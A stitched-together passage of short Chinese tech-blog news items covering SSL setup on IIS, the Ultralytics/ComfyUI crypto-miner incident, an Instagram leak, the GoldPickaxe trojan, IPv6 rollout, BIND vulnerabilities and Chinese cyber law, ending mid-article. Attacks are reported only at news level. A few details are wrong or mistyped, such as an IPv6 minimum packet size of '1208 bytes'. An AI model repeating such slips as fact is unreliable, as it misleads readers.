1)打开IIS 8.0管理器面板,定位到待安装证书的站点,单击绑定。 2)在网站绑定对话框中单击添加 > 选择https类型 > 端口选择443 > 导入的IIS证书名称 > 确定。 注:SSL缺省端口为443端口,请不要修改。如果您使用其他端口(例如8443端口),则访问网站时必须输入https://zhujib.com:8443。 4、验证SSL证书是否安装成功。 证书安装完成后,您可通过登录证书的绑定域名验证该证书是否安装成功。 https://zhujib.com #zhujib.com替换成证书绑定的域名。如果网页地址栏出现小锁标志,表示证书安装成功。 注:证书安装完成后,如果网站无法通过https正常访问,需确认您安装证书的服务器443端口是否已开启或被其他工具拦截。 #### Impact-Pack 插件曝存在严重安全漏洞 被黑客植入了加密货币挖矿病毒 近日,ComfyUI社区广受欢迎的插件 Impact-Pack 被曝存在严重安全漏洞,导致其依赖的 Ultralytics 包(版本8.3.41和8.3.42)被黑客植入了加密货币挖矿病毒。 由于 Impact-Pack 是几乎每位用户都会安装的插件,许多人可能因此受到了影响。病毒通过恶意修改的 Ultralytics 包自动下载并执行恶意程序,连接到可疑的矿池地址(connect.consrensys.com:8080)进行挖矿操作。病毒在后台悄无声息地运行,严重占用系统资源,并会自动删除执行文件以逃避检测。 目前,尚不清楚黑客是如何攻击的,也没有明确证据表明其他包是否也受到相同的攻击,一些开发者怀疑此次事件可能与内部人员泄露有关。幸运的是,这次漏洞仅涉及 PyPI(Python 官方软件包仓库)上的 Ultralytics 包。用户可以选择通过 GitHub 直接安装该依赖,或者使用已修复的 8.3.43 版本,以确保系统安全。 鉴于该漏洞的隐蔽性,官方已建议所有受影响的用户立即卸载有问题的插件和依赖包,并进行系统安全扫描以确保恶意文件被清除。此外,用户应谨慎选择插件来源,并及时关注官方更新,避免再次遭受类似攻击。 地址|:https://comfyui-wiki.com/zh/news/2024-12-05-comfyui-impact-pack-virus-alert#google_vignette #### Instagram爆发大规模数据泄露:近1750万用户信息遭窃,母公司Meta暂未回应 1月11日综合消息,网络安全公司Malwarebytes于当地时间1月10日发布警告称,其在暗网监控中发现了一起涉及约1750万用户的Instagram大规模数据泄露事件。 据分析,此次泄露事件并非由传统的服务器入侵导致,而是攻击者通过一个可能在2024年末未受充分保护的API端点,系统性地抓取了公开接口中的数据。泄露的信息主要包括用户的全名、电子邮件地址、电话号码以及位置数据等个人敏感信息。安全公司强调,目前没有证据表明用户密码在此次事件中泄露。 尽管密码未被获取,但攻击者已开始对窃取的数据进行“武装化”利用。大量Instagram用户报告称,近期收到了异常频繁的密码重置通知邮件。安全专家指出,攻击者正有意滥用Instagram平台自身的安全功能制造混乱,旨在冒充官方人员实施网络钓鱼、诈骗,或创造机会尝试窃取用户的登录凭证。 安全研究人员进一步警告,由于电子邮件和电话号码同时泄露,这为实施“SIM卡交换攻击”创造了极其有利的条件。在此类攻击中,犯罪分子通过欺骗电信运营商将目标手机号转移至自己控制的SIM卡上,从而拦截包含双重验证(2FA)代码在内的所有短信,最终接管受害者的各类网络账户。 截至发稿前,Instagram的母公司Meta尚未就此事件发布任何官方声明,也未对外说明数据泄露的具体原因、途径,以及是否会直接通知受影响的用户。 #### Internet Explorer(IE)浏览器正式停止了 微软IE浏览器(6月16日)正式退役了,这个古老的浏览器当年市场占有率一度高达90%,很多网页前端当年为了适配IE浏览器可没少掉头发,因为实在太难了。 主机吧博客目前用IE浏览器访问都是错位的 #### iOS系统首现木马病毒GoldPickaxe 据网络安全公司Group-IB的报告,iOS系统首次发现了一款名为GoldPickaxe的木马病毒,这是针对iPhone用户发起的一种银行木马攻击。 如何工作? GoldPickaxe木马病毒主要是通过收集用户的面部识别数据、身份证件以及截获的短信等信息,然后利用这些信息制作深度伪造视频,并能够自主访问受害者的银行应用程序。 主要目标 目前,GoldPickaxe木马主要针对越南和泰国的用户。然而,一旦成功入侵目标设备,背后的网络犯罪分子可能会将目标扩展到美国、加拿大和其他英语国家的iPhone和Android用户。 安全建议 对于用户来说,建议及时安装最新的系统更新以保护自己免受恶意软件攻击。同时,也需要提高警惕,避免下载未知来源的应用,以免遭受类似的攻击。 请注意,以上信息仅为参考,具体细节可能会有所变化。为了获取最新和最准确的信息,建议您关注权威的新闻发布平台。 #### iPhone 14 Pro信号被吐槽差 网友调侃:买到正品了 9月27日 消息:在iPhone14系列发售后,不少网友已经拿到新机。因为灵动岛等新变化使得iPhone14Pro 系列成为最畅销的机型。 不过,不少拿到iPhone14Pro的网友在网上吐槽信号差到离谱,自己的手机经常有网络加载慢、网速差、发不出消息、刷不出微博等问题。特别是在地铁,网络基本没法用。 对此,有网友表示:“信号差说明买到正品了。” 更有开玩笑说:“为什么买苹果的人还要坐地铁。“ #### iPhone苹果手机如何进行使用ping域名IP测试网络 Ping命令是一个非常好的网络故障诊断工具,对于一些网络维护人员来说,通常都会在电脑中借助ping命令查看网络连接情况。现在问题来了,有朋友问:iPhone手机可以进行ping测试吗?答案是肯定的,今天主机吧就来教大家iPhone怎么ping测试,教大家如何使用手机检测网络是否存在故障,下面以iPhone6s使用ping命令测试网络为例,方法步骤如下。 iPhone怎么ping测试? 在电脑中,我们可以非常方便的在运行或者cmd命令框种,使用ping命令检测网络是否正常。而智能手机尽管在功能方面与PC已经十分类似,但系统本身中并没有内置ping工具,而是需要借助第三方APP来实现,具体方法步骤如下。 1、首先将iPhone连接上Wifi无线网络,然后打开Apple Store应用商店,然后搜索“ping”,之后找到下载安装一款名为“iNetTools网络诊断免费工具”,如下图。 Ps.搜索ping可以找到很多相关工具,大家也可以选择其它自己喜欢的工具进行下载。 2、在iPhone中下载安装iNetTools工具后,打开APP,然后进入「ping」工具,如下图。 3、然后在ping界面的服务器下面输入需要ping的ip地址或者网址,比如小编需要ping脚本之家网址,只需输入:zhujib.com  完成后,点击右上角的“启动”即可如下图。 4、点击启动之后,就可以ping到zhujib.com网站的服务器IP地址了,如果需要停止ping,可以点击右上角的“停止”即可,如下图所示。 以上就是iPhone6s使用ping命令方法,通过iNetTools诊断工具可以通过iPhone查看Wifi网络使用情况,可以查看对于网站的服务器IP地址、ping TTL值以及访问的Time时间,Time数值越小,说明网络访问越流畅,如果出现连续的丢包现象,则说明网络不是很稳定。 大家如果还有疑问的话,可以在下方的评论框内给我们留言哦。我们会尽自己所能的为大家解答。谢谢大家一如既往的支持,也请大家继续关注主机吧的后续教程和软件。 #### IPV4要没了!湖南联通停止向普通家庭宽带用户提供公网 IPv4 地址 0 月 18 日消息,湖南联通近日在官网发布公告,宣布自 2021 年 10 月 15 日起优化普通家庭宽带用户 IP 地址分配机制,对在网及新增普通家庭宽带用户均提供动态 IPv6 地址,不再提供公网 IPv4 地址。 本次变更对用户使用(如速率、资费、接入方式等)无任何影响。 此前,2020 年 7 月份,湖南电信就已率先宣布停止向普通宽带用户提供公网 IPv4 地址,改为只提供动态 IPv6 地址。 2017 年,中共中央办公厅、国务院办公厅印发《推进互联网协议第六版(IPv6)规模部署行动计划》(以下简称《行动计划》),要求加快推进基于互联网协议第六版(IPv6)的下一代互联网规模部署,促进互联网演进升级和健康创新发展。 该《行动计划》明确,到 2020 年末,IPv6 活跃用户数超过 5 亿,在互联网用户中的占比超过 50%,新增网络地址不再使用私有 IPv4 地址,并在以下领域全面支持 IPv6: 国内用户量排名前 100 位的商业网站及应用,市地级以上政府外网网站系统,市地级以上新闻及广播电视媒体网站系统; 大型互联网数据中心,排名前 10 位的内容分发网络,排名前 10 位云服务平台的全部云产品; 广电网络 (5.340, 0.01, 0.19%),5G 网络及业务,各类新增移动和固定终端,国际出入口。 2021 年 7 月,中央网信办、国家发改委、工信部联合发布《关于加快推进互联网协议第六版(IPv6)规模部署和应用工作的通知》(以下简称《通知》)。 《通知》明确到 2023 年末,基本建成先进自主的 IPv6 技术、产业、设施、应用和安全体系,形成市场驱动、协同互促的良性发展格局。IPv6 活跃用户数达到 7 亿,物联网 IPv6 连接数达到 2 亿。移动网络 IPv6 流量占比达到 50%,城域网 IPv6 流量占比达到 15%。国内主要内容分发网络、数据中心、云服务平台、域名解析系统基本完成 IPv6 改造。新上市的家庭无线路由器全面支持并默认开启 IPv6 功能。县级以上政府网站、国内主要商业网站及移动互联网应用 IPv6 支持率显著提升。IPv6 单栈试点取得积极进展,新增网络地址不再使用私有 IPv4 地址。 从这里可以出国内已经在逐步淘汰掉IPV4了,以后如果网站不支持IPV6的话,那是没法访问了…… #### IPv6 和 IPv4 的区别有哪些? IPv6与IPv4的区别 IPv6和IPv4是互联网协议的两个版本,它们在多个方面有显著的区别。IPv6是为了解决IPv4地址空间枯竭问题而设计的,同时也引入了一些新的特性和改进。 地址长度和空间 IPv6的最显著特点是其地址长度。IPv6地址是128位的,远远大于IPv4的32位地址长度。这使得IPv6拥有几乎无限的地址空间,理论上每个人都可以分配到大约4.86 × 10^28个IPv6地址。相比之下,IPv4的地址空间只有大约43亿个唯一地址,已经无法满足互联网快速增长的需求。 地址表示方法 IPv6地址通常使用32个十六进制数表示,分为八组,每组四个数字,组与组之间用冒号分隔。而IPv4地址则是用点分十进制表示,每个部分代表一组构成8位地址方案的8位地址。 地址类型 IPv6具有单播、多播和任播三种基本类型的地址,而IPv4具有多播、广播和单播三种类型的地址。IPv6取消了广播地址,改用多播地址来实现相似的功能。 报头结构 IPv6的报头结构更为简化,只有8个字段,而IPv4有12个字段。IPv6的简化报头有助于提高处理速度和效率。 安全性 IPv6在设计时就考虑了安全性,支持端到端的IPSec安全传输,这是IPv4中可选的功能。IPv6的安全特性在可溯源性、反黑客嗅探能力、路由协议以及端到端的IPSec安全传输能力等方面提升了网络安全。 自动配置 IPv6支持无状态地址自动配置(SLAAC),允许设备在没有服务器的情况下自动配置自己的IP地址,而IPv4通常需要DHCP服务器来分配地址3。 数据包处理 IPv6的数据包处理也有所不同,例如,IPv6的最小数据包大小为1208字节,而IPv4为576字节3。 过渡技术 由于IPv4和IPv6不直接兼容,因此在过渡期间需要使用特定的技术来实现两者之间的通信,如双协议栈、隧道技术和NAT协议转换。 综上所述,IPv6相较于IPv4,提供了更大的地址空间、更高的安全性、更简化的报头结构和更有效的数据包处理。尽管IPv6的部署需要克服一些技术和实施挑战,但它被设计为能够支持互联网未来的增长和发展。 #### IPv6加速普及,2024年目标8亿用户 4月20日消息,中央网信办、国家发展改革委、工业和信息化部近日联合印发《深入推进IPv6规模部署和应用2024年工作安排》。 明确以下工作目标: 到2024年末,IPv6活跃用户数达到8亿,物联网IPv6连接数达到6.5亿,固定网络IPv6流量占比达到23%,移动网络IPv6流量占比达到65%。 IPv6网络性能显著提高,使用体验提升明显。 云服务、内容分发网络、数据中心在业务开通时默认启用IPv6功能。 主要商业网站及移动互联网应用IPv6支持率达到95%,IPv6行业融合应用更加深入广泛。 固定网络IPv6贯通水平大幅跃升,新出厂家庭路由器、机顶盒等终端设备默认启用IPv6,存量家庭路由器IPv6开启率明显提升,企业机构互联网专线IPv6开通率明显提高。 IPv6单栈支持能力持续增强。 IPv6 ”创新技术应用领域进一步拓展。 IPv6标准体系持续完善,立项IPv6国家标准达到50项。 还部署了10项重点任务: 增强IPv6网络性能和服务质量 包括加大IPv6网络优化力度、优化IPv6业务开通流程、持续提升IPv6互联互通水平、持续深入推进广电网络IPv6改造。 提高应用设施IPv6部署水平 包括加强云产品IPv6推广应用、提升内容分发网络IPv6流量占比、强化数据中心承载业务IPv6升级改造、推动算力基础设施同步部署IPv6。 提高终端设备IPv6连通水平 包括提升家庭路由器IPv6使用水平、扩大家庭智能终端IPv6支持范围、加快推进物联网IPv6应用。 强化先行先试和示范引领 包括开展重点城市IPv6专项行动、强化试点示范作用、推动党政机关办公网络率先开通IPv6、强化推进IPv6规模部署和应用专家委平台作用。 推进IPv6单栈部署演进 包括增强IPv6单栈运行能力、拓展IPv6单栈试点部署范围。 深化行业融合应用 包括深化中央企业行业系统IPv6改造、提升金融机构IPv6创新应用水平、推进农业农村部系统IPv6升级改造、深化教育行业IPv6部署应用、推进各级人社部门IPv6部署应用、推进民政信息系统IPv6部署应用、加强医疗卫生机构IPv6升级改造、推进交通数字化设施IPv6应用、拓展工业互联网IPv6应用、深化水利行业IPv6部署应用、加大自然资源与生态环境信息化IPv6改造力度、推动应急管理业务系统和终端支持IPv6。 扩大IPv6内容源规模 包括深化政务网络和应用服务IPv6升级改造、拓展商业应用IPv6支持范围。 推进创新生态和标准体系建设 包括强化IPv6 ”创新产业生态建设、加强互联网体系结构创新研究、持续推进IPv6国家标准制定与实施、积极参与IPv6技术国际标准制定。 强化网络安全保障 包括加快IPv6安全技术产品研发应用、加强IPv6网络安全防护和管理监督。 加大宣传推广力度 包括创新宣传形式和内容、丰富行业交流活动。 #### IPv6大跃进!阿里巴巴宣布全面IPv6 计划2年内完成 12月6日 消息:随着IPv4 网络地址资源变得越来越有限,下一代互联网连接协议的升级迫在眉睫。 12 月 6 日,阿里巴巴宣布将全力发展IPv6 生态,全面布局下一代互联网。 作为全球领先的科技公司之一,阿里巴巴早在 2017 年就开始投入IPv6 技术的应用和研发。并于今年双十一,在其旗下的淘宝、天猫、优酷以及高德地图等APP中大规模应用了IPv6 网络。截至 2018 年 12 月,阿里巴巴已为超 2000 万用户提供IPv6 服务,成为国内首家率先进行IPv6 超大规模应用的科技公司。 阿里巴巴集团CTO、阿里云智能总裁张建锋表示,在未来1- 2 年内,阿里生态全面支持IPv6,力求在 2020 年完成阿里IPv6 生态建设,未来3- 5 年内,带动客户、供应商、合作伙伴全面支持IPv6。 据了解,IPv6 是用于替代现行版本IP协议(IPv4)的下一代IP协议,相较于IPv4 有限的网络地址资源。IPv6 不仅拥有充足的网络地址资源,而且也解决了多种接入设备连入互联网的障碍,更有利于促进互联网的应用和发展。 各位站长,考虑到未来IPv6越来越多,还是赶紧给自己服务器申请个IPv6吧,实在不行用百度云加速CDN转换访问。 #### IPv6普及:中国IPv6地址分配数居全球第二 中国互联网络信息中心日前发布了《2017 IPv6地址资源分配及应用情况报告》。报告指出,截至2017年12月31日,我国IPv6地址分配总数为23430块(/32),全球排名居第二位。 目前,全球IPv4地址资源已经分配殆尽,全球互联网正在向以IPv6地址为基础的下一代互联网络过渡。IPv6是由国际互联网标准化组织IETF设计的用于替代现行版本IPv4的下一代互联网核心协议。 实际上,尽管我国IPv6地址分配总数居全球第二位,但目前国内IPv6用户数占国内网民的比例很小。总体来看,国内互联网应用服务对于IPv6的支持工作依然任重道远。 报告同时指出,随着云计算、物联网、大数据等技术的不断发展,以及IPv6的进一步发展,基于IP地址的全过程管理是提升我国互联网核心竞争力的重要内容,也是促进国内下一代互联网进一步发展的重要保障。 主机吧了解到,我国已经部署全面推进IPv6。2017年11月,中办、国办印发《推进互联网协议第六版(IPv6)规模部署行动计划》,提出用5到10年时间,形成下一代互联网自主技术体系和产业生态,建成全球最大规模的IPv6商业应用网络。 #### IPv6标准工作组成立 将加快互联网演进升级 9月2日消息:据中国通信标准化协会官方微信公众号消息,9月1日,IPv6标准工作组成立大会在北京召开。 据介绍,IPv6标准工作组是在中央网信办、国家发改委、工信部、国家市场监管总局指导支持下成立的专业标准化组织,标志着IPv6标准化工作进入新阶段,将加速IPv6国内国际标准化工作进程,加快互联网演进升级,助力网络强国建设。 工业和信息化部信息通信发展司司长谢存指出,中国通信标准化协会要在各有关部门的指导下,充分发挥平台作用,汇聚产学研用各方力量,积极组织开展IPv6标准化研制工作,为IPv6部署改造和应用推广提供指导。各有关方面要进一步加强协同,深化IPv6相关标准成果的推广和应用,促进IPv6端到端网络质量提升、产业发展和应用创新,构建广泛的IPv6应用生态。 IPv6是英文“Internet Protocol Version 6”(互联网协议第6版)的缩写,是互联网工程任务组(IETF)设计的用于替代IPv4的下一代IP协议,其地址数量号称可以为全世界的每一粒沙子编上一个地址  。 由于IPv4最大的问题在于网络地址资源不足,严重制约了互联网的应用和发展。IPv6的使用,不仅能解决网络地址资源数量的问题,而且也解决了多种接入设备连入互联网的障碍 。 互联网数字分配机构(IANA)在2016年已向国际互联网工程任务组(IETF)提出建议,要求新制定的国际互联网标准只支持IPv6,不再兼容IPv4。 2021年7月12日,中央网络安全和信息化委员会办公室、国家发展和改革委员会、工业和信息化部发布关于加快推进互联网协议第六版(IPv6)规模部署和应用工作的通知。 #### IP地址被别人知道了有什么危险吗? IP地址被别人知道了可能会带来一些潜在的风险。以下是一些可能的风险: 隐私泄露:IP地址可能包含用户的个人信息,如家庭住址、工作单位等。一旦这些信息被恶意攻击者获取,用户的隐私就可能遭到泄露。 网络攻击:攻击者可以通过分析IP地址,找到网络中的漏洞和薄弱点,进而发起针对性的攻击。例如,利用IP地址进行DDoS攻击、SQL注入等。 账号被盗:攻击者可以通过IP地址获取用户的账号信息,如邮箱、社交媒体账号等,从而实施各种欺诈和恶意行为。 为了防止IP地址被滥用,你可以采取以下一些防范措施: 强密码设置:为网络设备设置复杂的密码,避免使用简单密码或默认密码。同时,定期更换密码,以防止密码被破解。 不随意打开陌生链接:避免点击来自不信任来源的链接,以防下载恶意软件或泄露个人信息。 使用防火墙:配置防火墙以监控网络流量,防止未经授权的访问和数据泄露。 使用虚拟专用网络:通过加密网络连接,保护IP地址不被恶意攻击者获取。 定期更新软件:及时安装安全补丁和更新软件,以修复潜在的安全漏洞。 总的来说,虽然IP地址暴露具有一定的危险性,但我们可以通过采取有效的防范措施来降低风险。在享受网络便利的同时,我们也要时刻关注网络安全问题,保护好自己的IP地址和个人信息。 #### IP数据公司IPIP.net 状告阿里云抄袭其产品数据 北京天特信科技有限公司(以下简称“IPIP.net”)是一家专注于IP地理位置以及IP画像数据的研究、收集、整理、分析的数据供应商。基于对各电信运营商以及网络服务的 BGP/ASN 数据分析处理得来的IP地址地理定位数据,可以甄别IP地址被分配使用的大致地理位置范围(部分可精确到市区县级)。IP地理位置数据有广泛的应用场景,可以用于广告业务(按地域精准投放)、CDN/DNS流量调度、定制专属内容(电商、视频、个性化推荐)、业务安全防范等。IPIP.net现有具有丰富IP数据经验的IP编辑40多人,以自动化结合人工方式进行IP数据的收集分享与审核入库,每日处理数据量超过1TB,使用全球600个以上的自有网络监测点进行辅助测量,数据24小时实时更新。客户遍布于各类型互联网公司,比较集中在广告行业、网络安全行业、电商行业、娱乐行业、金融行业、硬件行业,以及 CDN、DNS、VPN、视频、直播、互联网统计分析等细分领域。2020年3月,阿里云与IPIP.net达成IP地址数据库产品合作,但使用范围有限定。IPIP.net之后发现,阿里云同时也在销售“阿里云IP地理位置库”产品,向公众和商家提供与其类似的“IP地理位置查询”业务。阿里云与IPIP.net构成具有直接竞争关系的市场经营者。阿里云不但违反了与IPIP.net签署的《协议》的数据使用范围限制,还通过后台抓取IPIP.net的数据库信息并作为自己的产品销售获取利益。 另一方面又利用从IPIP.net处攫取的商业成果进行大肆宣传,通过低于IPIP.net的服务价格,不但导致了IPIP.net的商业损失,也利用了大量互联网企业对“阿里”品牌的信任,掠夺了大量IPIP.net的既有客户和潜在客户。阿里云的行为已直接违背了《反不正当竞争法》第八条、第十一条、第十二条第二款第四项和第二条等相关规定,应承担相应法律责任。 因此,IPIP.net请求法院查明事实,以维护其合法权益不受侵犯。希望法院判令阿里云立即停止针对原告的不正当竞争行为,包括立即停止抓取和向第三方提供原告的IP地理位置数据,立即删除其数据产品或服务中包括原告数据的内容,立即停止对其产品服务质量的不当宣传。判令连带赔偿其经济损失数百万元。阿里云对此回应称:“阿里云坚决反对抄袭行为,公司内部正在彻查此事,一定会给老高一个满意的答复!”IPIP.net同时还起诉了郑州埃文计算机科技有限公司,案由类似。老高原文:https://mp.weixin.qq.com/s/fKsHYNrM_ptMlMtLUuurww #### ISC敦促更新DNS服务器以封堵新的BIND域名系统漏洞 伯克利网络域名(BIND)9 是一个被广泛应用的开源 DNS 系统项目,但最近,其曝出了一个严重性颇高的 CVE-2021-25216 安全漏洞。互联网系统协会(ISC)指出,攻击者能够利用 BIND 的 GSS-TSIF 协议和 GSSAPI 安全策略协商机制中的缓冲区溢出漏洞来触发远程执行,进而导致更广泛的漏洞利用,包括但不限于系统崩溃和远程代码执行。 (来自:US Cert) 在 ISC 发布的一份咨询报告中,该协会概述了可能影响 DNS 系统安全性的三个漏洞。其中基于通用弱点评价体系(CVSS),BIND 9 32 / 64-bit 版本的漏洞严重性评级,分别为 8.1 / 7.4 。 需要指出的是,在使用默认 BIND 配置的情况下,系统并不会暴露易受攻击的代码路径,除非管理者另行设置了服务器的 tkey-gssapi-keytab / tkey-gssapi-credential 值。 通报中写道:尽管默认配置不易受到攻击,但 GSS-TSIG 经常被用于将 BIND 和 Samba 集成到一起的网络中,以及将 BIND 服务器和活动目录(Active Directory)域控制器结合在一起的混合服务器环境中。 对于满足了这些条件的服务器,ISC SPNEGO 实施极易受到各种类型的攻击,但具体取决于构建 BIND 的特定 CPU 体系结构。 ISC 提醒的第二个漏洞,是 CVSS 评级达到了 7.5 分的 CVE-2021-25215 。主要问题在于 DNAME 记录的处理方式中发现的可被远程利用的缺陷,且可能由于断言(Assertions)失败而导致进程崩溃。 危害最小的那个 Bug,是 CVSS 评级 6.5 分的 CVE-2021-25214 。研究人员在增量区域传输(IXFR)中发现了这个问题,如果名称服务器收到了错误格式的 IXFR,可能导致解析过程因断言失败而崩溃。 目前 ISC 尚未收到有关漏洞在野外被利用的报告,但还是希望大家能够对此提高警惕。因为仅需曝出一次成功的利用,就可能对 DNS 服务造成广泛的破坏。 比如在遭受了 DoS 拒绝服务攻击后,可能需要耗费数小时来补救,且后续很容易再次遭到破坏。基于此,ISC 希望尽快部署更新,目前 BIND 9.11.31、9.16.15 和 9.17.12 版本中均已集成了修复程序。 最后,本周早些时候,微软披露了互联网(IoT)和工业技术代码中存在的内存错误分配 bug 。这类操作被其统称为 BadAlloc,目前该公司正在与国土安全部(DHS)合作,以向受影响的供应商发出警报。 #### itdog一家非常不错的网站测试工具网 itdog简称IT狗,是一家运营了很多年的网络工具类网站,名气虽然不如站长之家,但是工具非常齐全。 比如网站测速、DNS查询、在线ping等都非常不错,主机帮最喜欢他家的测速工具,支持快速测速和缓速测试,这个很重要,因为往往快速测速服务器是承压的,造成的后果是网站测出来的速度贼慢,只有服务器能承受得往很高的并发的时候,才能看到效果,17测就是这个问题,而缓存测试没有这个问题。 同时IT狗还支持IPV6测速、ping、查路由,还支持一键关闭网站上的所有广告,这个非常赞! 这么好的网站,推荐各位站长使用,地址:https://www.itdog.cn/ 平时用来测测网站速度是非常不错的选择,比17测和站长之家好使。 #### IT之家的圈子功能下线了 最近,主机帮在逛IT之家的时候,发现IT之家的圈子下线了。 显示因产品业务调整,圈子功能已下线。 圈子功有类似于以前的论坛,在这里用户可以对某一主题进行讨论,发话题等,是一个提升网站用户黏度的功能,深受网站用户的喜爱。 不过,这个开启圈子功能后,面临的政策压力也是非常大的,原因是人多了,自然杂,有些用户发布了一些非法的内容,风险是非常高的。印象中IT之家因为这个问题被要求整改过几次,后来又重开了。 此次下线,并不是临时关闭,看来是真的要下线了。 而且主机帮还发现文章的评论也是不登陆无法查看。 甚至还出现了老旧文章不显示评论的操作。 由此可见,IT之家正遭受监管压力,目前国内做网站的,基本都会面临一个问题,不让用户说话,只有一些大型网站或者APP才开通评论功能,中小型网站基本都面临关闭评论的命运,这导致了很多中小型网站越来越边缘化,寡头严重,近十年国内已经没有出现过新的大型网站了,实在是互联网悲哀。 #### IT成了高危行业?拒不履行「信息网络安全管理义务」可处三年以下有期徒刑等处罚 2019年10月25日,最高人民检察院网上发布厅发布《最高人民法院 最高人民检察院关于办理非法利用信息网络、帮助信息网络犯罪活动等刑事案件适用法律若干问题的解释》。《最高人民法院 最高人民检察院关于办理非法利用信息网络、帮助信息网络犯罪活动等刑事案件适用法律若干问题的解释》已于2019年6月3日由最高人民法院审判委员会第1771次会议、2019年9月4日由最高人民检察院第十三届检察委员会第二十三次会议通过,现予公布,自2019年11月1日起施行。最高人民法院 最高人民检察院2019年10月21日最高人民法院 最高人民检察院关于办理非法利用信息网络、帮助信息网络犯罪活动等刑事案件适用法律若干问题的解释(2019年6月3日最高人民法院审判委员会第1771次会议、2019年9月4日最高人民检察院第十三届检察委员会第二十三次会议通过,自2019年11月1日起施行)法释〔2019〕15号为依法惩治拒不履行信息网络安全管理义务、非法利用信息网络、帮助信息网络犯罪活动等犯罪,维护正常网络秩序,根据《中华人民共和国刑法》《中华人民共和国刑事诉讼法》的规定,现就办理此类刑事案件适用法律的若干问题解释如下:第一条  提供下列服务的单位和个人,应当认定为刑法第二百八十六条之一第一款规定的“网络服务提供者”: 第二百八十六条之一 拒不履行信息网络安全管理义务罪   网络服务提供者不履行法律、行政法规规定的信息网络安全管理义务,经监管部门责令采取改正措施而拒不改正,有下列情形之一的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金:   (一)致使违法信息大量传播的;  (二)致使用户信息泄露,造成严重后果的;   (三)致使刑事案件证据灭失,情节严重的;   (四)有其他严重情节的。 单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照前款的规定处罚。 有前两款行为,同时构成其他犯罪的,依照处罚较重的规定定罪处罚。 (一)网络接入、域名注册解析等信息网络接入、计算、存储、传输服务;(二)信息发布、搜索引擎、即时通讯、网络支付、网络预约、网络购物、网络游戏、网络直播、网站建设、安全防护、广告推广、应用商店等信息网络应用服务;(三)利用信息网络提供的电子政务、通信、能源、交通、水利、金融、教育、医疗等公共服务。第二条  刑法第二百八十六条之一第一款规定的“监管部门责令采取改正措施”,是指网信、电信、公安等依照法律、行政法规的规定承担信息网络安全监管职责的部门,以责令整改通知书或者其他文书形式,责令网络服务提供者采取改正措施。认定“经监管部门责令采取改正措施而拒不改正”,应当综合考虑监管部门责令改正是否具有法律、行政法规依据,改正措施及期限要求是否明确、合理,网络服务提供者是否具有按照要求采取改正措施的能力等因素进行判断。第三条  拒不履行信息网络安全管理义务,具有下列情形之一的,应当认定为刑法第二百八十六条之一第一款第一项规定的“致使违法信息大量传播”:(一)致使传播违法视频文件二百个以上的;(二)致使传播违法视频文件以外的其他违法信息二千个以上的;(三)致使传播违法信息,数量虽未达到第一项、第二项规定标准,但是按相应比例折算合计达到有关数量标准的;(四)致使向二千个以上用户账号传播违法信息的;(五)致使利用群组成员账号数累计三千以上的通讯群组或者关注人员账号数累计三万以上的社交网络传播违法信息的;(六)致使违法信息实际被点击数达到五万以上的;(七)其他致使违法信息大量传播的情形。第四条  拒不履行信息网络安全管理义务,致使用户信息泄露,具有下列情形之一的,应当认定为刑法第二百八十六条之一第一款第二项规定的“造成严重后果”:(一)致使泄露行踪轨迹信息、通信内容、征信信息、财产信息五百条以上的;(二)致使泄露住宿信息、通信记录、健康生理信息、交易信息等其他可能影响人身、财产安全的用户信息五千条以上的;(三)致使泄露第一项、第二项规定以外的用户信息五万条以上的;(四)数量虽未达到第一项至第三项规定标准,但是按相应比例折算合计达到有关数量标准的;(五)造成他人死亡、重伤、精神失常或者被绑架等严重后果的;(六)造成重大经济损失的;(七)严重扰乱社会秩序的;(八)造成其他严重后果的。第五条  拒不履行信息网络安全管理义务,致使影响定罪量刑的刑事案件证据灭失,具有下列情形之一的,应当认定为刑法第二百八十六条之一第一款第三项规定的“情节严重”:(一)造成危害国家安全犯罪、恐怖活动犯罪、黑社会性质组织犯罪、贪污贿赂犯罪案件的证据灭失的;(二)造成可能判处五年有期徒刑以上刑罚犯罪案件的证据灭失的;(三)多次造成刑事案件证据灭失的;(四)致使刑事诉讼程序受到严重影响的;(五)其他情节严重的情形。第六条  拒不履行信息网络安全管理义务,具有下列情形之一的,应当认定为刑法第二百八十六条之一第一款第四项规定的“有其他严重情节”: (一)对绝大多数用户日志未留存或者未落实真实身份信息认证义务的;(二)二年内经多次责令改正拒不改正的;(三)致使信息网络服务被主要用于违法犯罪的;(四)致使信息网络服务、网络设施被用于实施网络攻击,严重影响生产、生活的;(五)致使信息网络服务被用于实施危害国家安全犯罪、恐怖活动犯罪、黑社会性质组织犯罪、贪污贿赂犯罪或者其他重大犯罪的;(六)致使国家机关或者通信、能源、交通、水利、金融、教育、医疗等领域提供公共服务的信息网络受到破坏,严重影响生产、生活的;(七)其他严重违反信息网络安全管理义务的情形。第七条  刑法第二百八十七条之一规定的“违法犯罪”,包括犯罪行为和属于刑法分则规定的行为类型但尚未构成犯罪的违法行为。第八条  以实施违法犯罪活动为目的而设立或者设立后主要用于实施违法犯罪活动的网站、通讯群组,应当认定为刑法第二百八十七条之一第一款第一项规定的“用于实施诈骗、传授犯罪方法、制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组”。第九条  利用信息网络提供信息的链接、截屏、二维码、访问账号密码及其他指引访问服务的,应当认定为刑法第二百八十七条之一第一款第二项、第三项规定的“发布信息”。第十条  非法利用信息网络,具有下列情形之一的,应当认定为刑法第二百八十七条之一第一款规定的“情节严重”:(一)假冒国家机关、金融机构名义,设立用于实施违法犯罪活动的网站的;(二)设立用于实施违法犯罪活动的网站,数量达到三个以上或者注册账号数累计达到二千以上的;(三)设立用于实施违法犯罪活动的通讯群组,数量达到五个以上或者群组成员账号数累计达到一千以上的;(四)发布有关违法犯罪的信息或者为实施违法犯罪活动发布信息,具有下列情形之一的:1.在网站上发布有关信息一百条以上的;2.向二千个以上用户账号发送有关信息的;3.向群组成员数累计达到三千以上的通讯群组发送有关信息的;4.利用关注人员账号数累计达到三万以上的社交网络传播有关信息的;(五)违法所得一万元以上的;(六)二年内曾因非法利用信息网络、帮助信息网络犯罪活动、危害计算机信息系统安全受过行政处罚,又非法利用信息网络的;(七)其他情节严重的情形。第十一条  